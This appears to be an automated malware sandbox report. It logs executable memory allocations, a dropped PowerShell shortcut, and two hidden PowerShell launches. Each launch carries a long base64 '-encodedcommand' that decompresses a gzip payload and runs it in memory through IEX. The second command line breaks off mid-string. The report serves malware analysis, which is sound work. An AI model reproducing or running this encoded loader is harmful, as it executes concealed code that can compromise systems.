NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 30, 2024, 9:42 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGMARwBwAHUARgBlAHgARABMAEcAcwBEAFkAUQBGAE8AMwBiACsAZAA0AHcAcwBJAHcAOABnAHAAbwBhAHUAZwA2AHUAbABQAC8ANgBxADAAdwB1ADcAKwBzAHYATgBXADYAZgBHAEcANQBjAEsAYQB0AFoAagBKAEYAWABzADEAMgAzAFQAQgBJAC8AeQBQAHgAQQBMAFEAdABSAHAAUwB3ADUAVgBoAFQARQB3AFEAcgBYAHAAbwA3AGYAYgBOAFEAbQBoAGYAZAB5ADQAYgB4ADAAOQByADEATQBYAGkASgBiAGgAdwBiAEUAOABYAG0AUQB1AGQAVwB6AFQAcQBVAE0AdwB4AEYAZwBRADUAOAB4AEwARgBlAEoAWgBYADcAZQA4AHUAVwBGACsAUABiAG0AagBaAEwANAAyAFAARgBRAFQAZgBBAHgAaQBvAEoAUQBSAGQASABCAHMAVgBCAGMANgB4AHUAKwA3AFMASQBGAHIAVQBDAHQASABFAE0ASwAvAFgAVwBaAEIAQwBjAGkAaABKAFAASQBKADYANgArAGcATgA0AGgAMgBLAEgASwByAFoAKwA0AGIAaABYAHMATAB2AC8AVQA3AGsAdABGAFIAdQBrAFYAMwBEADkAVgBxAHIAeABYAEEAcQBrAFIAagBzAGoAcQBoAFIATgAvAEEAbwBkAFUAOABPAFoAcwBEAHMATAA1AHoAZgB0ADMANQBDAEwAaAA3AHoAZQBDAGsAYQBVAGYAcABRACsAbwBhAGkATQBYAHIAUQAyAE0AWABqAEgAZwArADQANgByAHAAWgB1AGIAWgBUAEYARQBFAEUAOQBsAEYATQBSAE8AbwBmAGUAVgBvAEsAcQBFAEIARQA0AFkATwBJAGkAeQBQAEoAMQBhAGwAQwBEAHkANQBXAGQAKwB6AHMAZABlAE4AZQBQAHEAcAA0AGIAcQBWADYAMgBMAHoAagBrADkAWgB6ACsAKwBFAGsAcwA5AGMATwB5AFgAMABnADEAWgB1AHIAQQBuAFgAMwA4ADEARQA4AGUAMQBVAFoAVAB2AGYAMwA0AGIAVwBMAFIAeQBmAE0AUgBtAHYAdQBFADUAMQBwAFgAdwBsAFkAOQB5AGgAbABZAHUASwB2AEMAbwBYAGMAVgBrADgATABOAFMAdgBtAHcAZwBtADcAMgBnAFUAOAA0AEIAWABmADYAdQB4AG4AawBPAGYAdABQAHQAbgBwADIAagBMAGMAaAA3AEQARgA0AEIASgBjAGgAZgBuAFQAbgBuAHMARgBJAFcAZgBBAGwANQBnAE4AOQA1AEQAagBTADkAWABjAEUAMQBRADEAZgBwAHkAOQBYAEsAcgBxAGYAbgA4ADUAegBMAGoARwB2AEUAYwBaAFUAWQBKAFgARABQAHIAUwBxAGgASQBzAE4ARgBkAHAAVwBnAC8AZABpADUAYgBOAEUASgBEAG8AcABoACsAYQBlADcAVQB1AEoAaQB4AHoASgBpAGYARABYADMAUQBuADQAQQA2AGUAVgBvAEoAdgBEAGgAeABpAFEAVwBaAEIAZABnADAATgBRAFEAVwBZADcAaAA1AHEAaABVAGkAYgA1AGoAbwAyADYAbQBPAHUAdQByAEMAKwBVAFAATQBXAEUATQAxADQAVQByAEIANQBZAE8AawBCAE4AWQB5AGIARgBRAGMAYwA2AFoAeQBLADcAKwBPAHoALwBJAG0AbwBxAHcANABJAFUAdQA4AGsAQwA2AHEARQBLADgAYQA2AHkAaAA1AGwAeAB1AFYARQBFADMAWQA0ADMAcwA4AG4AOQB3ACsAMwBwAFAAegBwAGMAaQB4ACsAbwBLADAAagB1AG4AZwBRAEMAcQBHACsAQQBxAG8AVABzAFIAaAByAHAAVwByAHYANQBHAHYAUAAvAE4AdgBWADkATAB6AEMAOQB1AE0AaABHADYASgBMAEoAUwBYAE0AUgBsAE4AOABQADUAZABiAGsAOQB2AEYAcgA1ADgALwBMADEARABjAGsAQwB0AHcAZwBEAFoAbgB3AFUAZQBGADAAagBSAHUAMgBXAFcAaABTAHgAUwByAG4AWgBTAGYAWgBDAEoAbQAzAEgANwBhAGoASABIAGYAagArAHYAcwA5AHAAOABEAHYAQQByADcAbgBuAHUAZQBGAFEAVgBNAEsAdQBNAHIAUwA0ADUASABuAFUAcAA4AFMAVgBNAE8ANgB3AHIAUwBSAE4AaABFAFQAcgBVAGsAMgBlAEEAcgBuAFQAdgBzAGUAdABoAE0ATgB6AE0ASwA4AG4AWABxAHQAdQBoADgASgBCAGgAcgBYADQAYwBkACsAUABXAGUASABBADAAdgAzAEcAUAB1AEQAYgBhACsAZgBwAFkAdQBlAHMAUAB6AGIAVAB1AGoAawBUACsARQBlAHoAeAA3AGYANgBlAHMAegBuADgAbgAzAGgAMABPAFgAMwB6AEYATQBBADQAMwA4AEkAQgB5AFkAUQBRAGEALwBUAEQAdgAxAHUAYQByAGMAUQBKADcAYgBSAGIARwBpAGwAVABkAHgAQgB4AHYAcQBZAEQAZgBRADcAbABhAHIAMwA5AEUAdwBlADYAbAB3AG8AcQA3ADQAOQBOAE8AdABqAFgAcABSAFAARABRADQAZgBLAGIAdQB2AFUARABZAFgATAAyAHgAOQB6AHoAVgBIADUAaQBDAEUATwBJAFgAbQBXAG0AMwA3AFkAcQBhAHEAMwBjAHoAYQBKAGEAYwBSAEkAMgAyAHQAdgBqAHkAMABCAC8AdgBPAGcAMwAxAHEAWgBMAHoAYwBBAGgAeQBPAGEAaQBaAHQANQBtADMANwBhAE0AMwA0ADEASgByAEoAdwA2AHcALwBsADMAdABnAGQANQA5AE0AMQA2ADIAKwBwAEQAYgBCAHQAbQBvAGYAVQAzAHMAUwBQADQAcwBhAG4AagBkAEgAaAB0AGYASwBNAHIALwBGAEMARgB2AGgATwBMAFIAQwByAE0ALwBFAGQAbQBSAGsAVABEAGgAMABrAE4AbABkADQAVgB4AFgASABDADcAVwA0AGgATwBIAHoALwA2AHAAcQBwAEwAWgBZAE4AdgB0AGEAKwB3AEEAYgBQAHUATQBKAEUARQB1AGoAQQBjAGUAVABVAEIAbQBFAEQAdABnAHEAeABQAHQAQgBVAGYAYQBaAHUAMgB0ADEAWgBSAFQAUwBkAFgARgBxAGUATAB5AEIAcgB1AGgAWgBZADYAbQBWAEYAYgB2AGoAdABSAGQAUwA5AFoAMgBvAGMAeABPADMATABIAFEAYgB2AFMAcABRADAATwAvAGEAOQBqAEkAeQByAFIARABhADgAMAA5AGgAKwAwAEcAWQA3AE8AZQA4ADIAQgBpAHEAdABQAHAAbgBuAGEAeQBKAHoAbgA2AGEAbQB4AFEAbgBWAG0ANwBuADkAcgA4AGYAaABEAFAAcgBMADIANgBRAE4ANQBnAHMAdQBMAGQAZQB1AGQAeABKAGoAUgBFAGUAcwB3AHQATgBQADIANABZADMAVgBxAFkAZQByAHAAYwBhAGgAVABEAHkATwBXAEUAcgBVAEoAOQBUAFEAWQBjACsASgBNADMAUgAxAGwAbABzAGYARgBPAHMAUABqAFoAeQAxADkAWQBpAFoAMQBHAGYAegBwAE0AagBvAFYAUwB0AHIANABhAEcAcQA3AHoAbgB5AHkAYQBXAG0AcwBFAG8AeQBZAGMAUwByADIAZQBBAEYAeABLAFcAVQBPAEgAZABjAFoAYwA5ADMAZQBwAEcANAA5AG0ANQBRAG8ASwAvAHkAQwBVAGIAagA1AGcAcQBZAFcATQB1AHMAdgBVAGgAYgArAFgAMgBTAG4ASQBIAHQAVQBkAG4AcAB2AE0AbABrAG8AdgBUAEgAawB1AG0ANQByAHYAWABFAHEAagBiAGwAagBYADEAbgBYAHgAWQBtADcANgBFADMAMABRAEkAYgA1AE0AOAB1ADAAdwB2AG0AdQBTAHkAdQB1AFAARwBPADkAUgBiADcAVwBWADMAZAAxAEQAdgBTADQANgBTAFQAVQAyAEYAVAB1AGcANgAzAFIAMgBMAFYANwBZAEwAYwB4ADQAUgBZAEsANgA0AG0AYwBzAHEAdgBQAFEAQwBiAFIAZQBIAGUAZwBVAFUAOABNADIANQAzAEwAWABDAG8ATgBiAGUAQwBWAFEAaAAwAG4ARQAxAHIARwBkAGkAcgBwAHIARQBMAFAANgBhAGEAdABxAEQAdQA3AHAAKwBtAFcAeABOAE8AVQAxAHEATgBsAFIAVgBkADIASwByAGUAbQBOAEcAYQBkAHgANwAvAHAAMABRADEAdwBsAGQAdABJAFEAMgBlADMANQBaAG8ANgBOAFgAVQBlAGQATwA1AHgAdQB3ADMAbQBqAFoANgBBAE8ANQBsAHkAawBPAEsAdwAyADAAaABYAGUAMgBYAG0ASwBmADQAbwBmAEQAdwBjAEQAdgB6AHoASwBhAHcANwAyAFgAUQB4AGEAdQA0AGIASwAwAFkANwA4AGIAUQBwAFAAUABVADgAOQB4AGkAdgA5ADAAbABqADQAOABoAEQANgBzAEgAbwAyAHMAQgBUAGQAUwBvAFAAaABSAFAAdwBtAFkAcQAzAFEAawBQAGEAMgBoAHgAKwAzAEQAVABaAEgAdgBBAHcAOQBZAEkAMABCAGgANAA1AGQANwA2AFkANwBtAFAAZwBhAFMAYQB4AFEAaQBiAG4AWABEADEAaQBJACsAbwBXAFgASwAyAHYAMwBEADAAegBkAGwAbwBEAGMANgB2AEgAaQA4AGUAVwBsAEEAeQBhACsARwBSAE4AcQBLAE0AMABxAFEATwBXAE8AMQBGAFIATwBUAHkAQQB1AGMANwBxAC8ARgBRADQAKwBrAC8AcQBnAC8AQQAxAHIAMABtAHIASQBJAEkAdQA0ADMAVABLAG4AKwA1AC8ARQB2AG4AZwAzAHMAWABFAHAAZQA1AEEAdABZAEUAeQBWAGkAegBmADMAWgBIADUAOAAzAC8AWgBXAE0ATABLAFMAOQBHAHQAdgBaAHYAZQBtADAAYwB3ADEAbgB6AEkAQwAxAGgAUgA0AGcANwBHAHUAOABMADEAVwBRAGMAawBHAFYARwA4AE0AVgB3AG8AYQBOAEQARgBYAE4AOABnAFAAbwBqADQAUwB5ADgAeQBDAHAAeABjAG8AMQBMADUAdQBIADMAZQBvAGMAaABIAEwAcgBTAFcAMABIAHgAZQBLAHoAZgB0AHUAbwBHAFYAZAAwACsAZgB0AEQASABRAHkANQAwADcAcgBCAGQANABvAFMAWQB3AGIARABZACsASABKAEgARQBtAHkAQwAwAFQATwBlAFkAegBHAFMAMQBLAGoAcQBNAFMANABUAFgAUgB1AHMAcQArAE8AWABMAEEAcwBLAHIAdgBpAEUANABSAFAANABhAGIANgBvAEUAZABXAHgAUwBGAEoAWAAvAGIAMQBGAGsANgBjADkAQgBZAFkASQB3AHEAMQB5AE0AVgBmAFAAdQA2AHAAMABYAFAAMAA5AHgAaQAxAFAASQBDACsANQBSADQAbgB2AG8ALwB3AGoAOQBMADAAZgArAGQAMQBCAHoAMgBJAHIAMgA3AEEAMgAwAHcAcQBHAFAAawBTAEoATAA1AFcAKwBsAGsAcgBBAGkAMwBxADMASAB6AGcAawArAFAAdABDAGUANgBCAFMAYwBpADQASABuACsASAA0AGIAbQBQAEMAbABVAGoAeQA5AGwAVgB1AEQASgBBAFIAdQBSAHQAdwBhAHgAQQAvAGkASABzAEsAagA0ADIAWQBEAFAAbABlAGkAZABaAEsALwB3ADgAVABQAEwANwBEAHYAUgBHAG8ANABaACsAWAB2AGgASQBJAHMAQgBCADMAMAB2AFIAaQBZAHcARgBFAEUATABWAFYAdQB2AGoAQgAwAFYAWQBEADEAZgB3AEgALwBwAFUAVwBpADIAZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA

cmdline

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGMARwBwAHUARgBlAHgARABMAEcAcwBEAFkAUQBGAE8AMwBiACsAZAA0AHcAcwBJAHcAOABnAHAAbwBhAHUAZwA2AHUAbABQAC8ANgBxADAAdwB1ADcAKwBzAHYATgBXADYAZgBHAEcANQBjAEsAYQB0AFoAagBKAEYAWABzADEAMgAzAFQAQgBJAC8AeQBQAHgAQQBMAFEAdABSAHAAUwB3ADUAVgBoAFQARQB3AFEAcgBYAHAAbwA3AGYAYgBOAFEAbQBoAGYAZAB5ADQAYgB4ADAAOQByADEATQBYAGkASgBiAGgAdwBiAEUAOABYAG0AUQB1AGQAVwB6AFQAcQBVAE0AdwB4AEYAZwBRADUAOAB4AEwARgBlAEoAWgBYADcAZQA4AHUAVwBGACsAUABiAG0AagBaAEwANAAyAFAARgBRAFQAZgBBAHgAaQBvAEoAUQBSAGQASABCAHMAVgBCAGMANgB4AHUAKwA3AFMASQBGAHIAVQBDAHQASABFAE0ASwAvAFgAVwBaAEIAQwBjAGkAaABKAFAASQBKADYANgArAGcATgA0AGgAMgBLAEgASwByAFoAKwA0AGIAaABYAHMATAB2AC8AVQA3AGsAdABGAFIAdQBrAFYAMwBEADkAVgBxAHIAeABYAEEAcQBrAFIAagBzAGoAcQBoAFIATgAvAEEAbwBkAFUAOABPAFoAcwBEAHMATAA1AHoAZgB0ADMANQBDAEwAaAA3AHoAZQBDAGsAYQBVAGYAcABRACsAbwBhAGkATQBYAHIAUQAyAE0AWABqAEgAZwArADQANgByAHAAWgB1AGIAWgBUAEYARQBFAEUAOQBsAEYATQBSAE8AbwBmAGUAVgBvAEsAcQBFAEIARQA0AFkATwBJAGkAeQBQAEoAMQBhAGwAQwBEAHkANQBXAGQAKwB6AHMAZABlAE4AZQBQAHEAcAA0AGIAcQBWADYAMgBMAHoAagBrADkAWgB6ACsAKwBFAGsAcwA5AGMATwB5AFgAMABnADEAWgB1AHIAQQBuAFgAMwA4ADEARQA4AGUAMQBVAFoAVAB2AGYAMwA0AGIAVwBMAFIAeQBmAE0AUgBtAHYAdQBFADUAMQBwAFgAdwBsAFkAOQB5AGgAbABZAHUASwB2AEMAbwBYAGMAVgBrADgATABOAFMAdgBtAHcAZwBtADcAMgBnAFUAOAA0AEIAWABmADYAdQB4AG4AawBPAGYAdABQAHQAbgBwADIAagBMAGMAaAA3AEQARgA0AEIASgBjAGgAZgBuAFQAbgBuAHMARgBJAFcAZgBBAGwANQBnAE4AOQA1AEQAagBTADkAWABjAEUAMQBRADEAZgBwAHkAOQBYAEsAcgBxAGYAbgA4ADUAegBMAGoARwB2AEUAYwBaAFUAWQBKAFgARABQAHIAUwBxAGgASQBzAE4ARgBkAHAAVwBnAC8AZABpADUAYgBOAEUASgBEAG8AcABoACsAYQBlADcAVQB1AEoAaQB4AHoASgBpAGYARABYADMAUQBuADQAQQA2AGUAVgBvAEoAdgBEAGgAeABpAFEAVwBaAEIAZABnADAATgBRAFEAVwBZADcAaAA1AHEAaABVAGkAYgA1AGoAbwAyADYAbQBPAHUAdQByAEMAKwBVAFAATQBXAEUATQAxADQAVQByAEIANQBZAE8AawBCAE4AWQB5AGIARgBRAGMAYwA2AFoAeQBLADcAKwBPAHoALwBJAG0AbwBxAHcANABJAFUAdQA4AGsAQwA2AHEARQBLADgAYQA2AHkAaAA1AGwAeAB1AFYARQBFADMAWQA0ADMAcwA4AG4AOQB3ACsAMwBwAFAAegBwAGMAaQB4ACsAbwBLADAAagB1AG4AZwBRAEMAcQBHACsAQQBxAG8AVABzAFIAaAByAHAAVwByAHYANQBHAHYAUAAvAE4AdgBWADkATAB6AEMAOQB1AE0AaABHADYASgBMAEoAUwBYAE0AUgBsAE4AOABQADUAZABiAGsAOQB2AEYAcgA1ADgALwBMADEARABjAGsAQwB0AHcAZwBEAFoAbgB3AFUAZQBGADAAagBSAHUAMgBXAFcAaABTAHgAUwByAG4AWgBTAGYAWgBDAEoAbQAzAEgANwBhAGoASABIAGYAagArAHYAcwA5AHAAOABEAHYAQQByADcAbgBuAHUAZQBGAFEAVgBNAEsAdQBNAHIAUwA0ADUASABuAFUAcAA4AFMAVgBNAE8ANgB3AHIAUwBSAE4AaABFAFQAcgBVAGsAMgBlAEEAcgBuAFQAdgBzAGUAdABoAE0ATgB6AE0ASwA4AG4AWABxAHQAdQBoADgASgBCAGgAcgBYADQAYwBkACsAUABXAGUASABBADAAdgAzAEcAUAB1AEQAYgBhACsAZgBwAFkAdQBlAHMAUAB6AGIAVAB1AGoAawBUACsARQBlAHoAeAA3AGYANgBlAHMAegBuADgAbgAzAGgAMABPAFgAMwB6AEYATQBBADQAMwA4AEkAQgB5AFkAUQBRAGEALwBUAEQAdgAxAHUAYQByAGMAUQBKADcAYgBSAGIARwBpAGwAVABkAHgAQgB4AHYAcQBZAEQAZgBRADcAbABhAHIAMwA5AEUAdwBlADYAbAB3AG8AcQA3ADQAOQBOAE8AdABqAFgAcABSAFAARABRADQAZgBLAGIAdQB2AFUARABZAFgATAAyAHgAOQB6AHoAVgBIADUAaQBDAEUATwBJAFgAbQBXAG0AMwA3AFkAcQBhAHEAMwBjAHoAYQBKAGEAYwBSAEk